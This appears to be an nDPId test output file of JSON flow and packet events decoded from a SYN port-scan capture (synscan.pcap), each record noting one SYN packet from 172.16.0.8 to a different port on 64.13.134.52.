+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsYZEAAC8Gt+GsEAAIQA2GNIzSBErdUoMYAAAAAGACEAAkRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsGPMAADIG\/X+sEAAIQA2GNIzSB\/ndUoMYAAAAAGACDAAklgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsISwAACoG\/UasEAAIQA2GNIzTHwLdU4MZAAAAAGACDAANigAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAs7lAAACgGMiKsEAAIQA2GNIzTAE\/dU4MZAAAAAGACBAA0PQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAss2wAADYGXwasEAAIQA2GNIzTEVzdU4MZAAAAAGACDAAbMAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsgd0AACsGm5WsEAAIQA2GNIzTKYTdU4MZAAAAAGACEAD\/BwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAAC4GfTCsEAAIQA2GNIzTIALdU4MZAAAAAGACDAAMigAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsbe0AADkGoYWsEAAIQA2GNIzTAN7dU4MZAAAAAGACCAAvrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsKzEAAC0G8EGsEAAIQA2GNIzTDOTdU4MZAAAAAGACCAAjqAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAslAAAACgGjHKsEAAIQA2GNIzTF3fdU4MZAAAAAGACBAAdFQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAspNwAACUGfpasEAAIQA2GNIzT\/G\/dU4MZAAAAAGACCAA0HAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADcGgnusEAAIQA2GNIzTBGzdU4MZAAAAAGACEAAkIAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAs65MAADUGJ9+sEAAIQA2GNIzTAh\/dU4MZAAAAAGACCAAubQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVAAAC4G9SKsEAAIQA2GNIzTBAbdU4MZAAAAAGACDAAohgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAAC0G6qGsEAAIQA2GNIzTB9PdU4MZAAAAAGACCAAouQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsZcAAADMGr7KsEAAIQA2GNIzTOpvdU4MZAAAAAGACEADt8AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsdvMAADUGnH+sEAAIQA2GNIzTIyndU4MZAAAAAGACCAANYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060395,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_packet_id":1,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060395,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uAAADMGFpKsEAAIQA2GNIzTBAjdU4MZAAAAAGACEAAkhAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsVEkAADYGvimsEAAIQA2GNIzTBGLdU4MZAAAAAGACDAAoKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAskKIAACUGktCsEAAIQA2GNIzTACvdU4MZAAAAAGACCAAwYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsFzgAADYG+zqsEAAIQA2GNIzTBrXdU4MZAAAAAGACDAAl1wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsDqUAADQGBc6sEAAIQA2GNIzTFLLdU4MZAAAAAGACBAAf2gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsEZkAADsG+9msEAAIQA2GNIzToifdU4MZAAAAAGACEACGZAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMwAADsGRKasEAAIQA2GNIzTH5jdU4MZAAAAAGACEAAI9AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsGE4AADUG+ySsEAAIQA2GNIzTF3PdU4MZAAAAAGACCAAZGQAAAgQFtA=="} 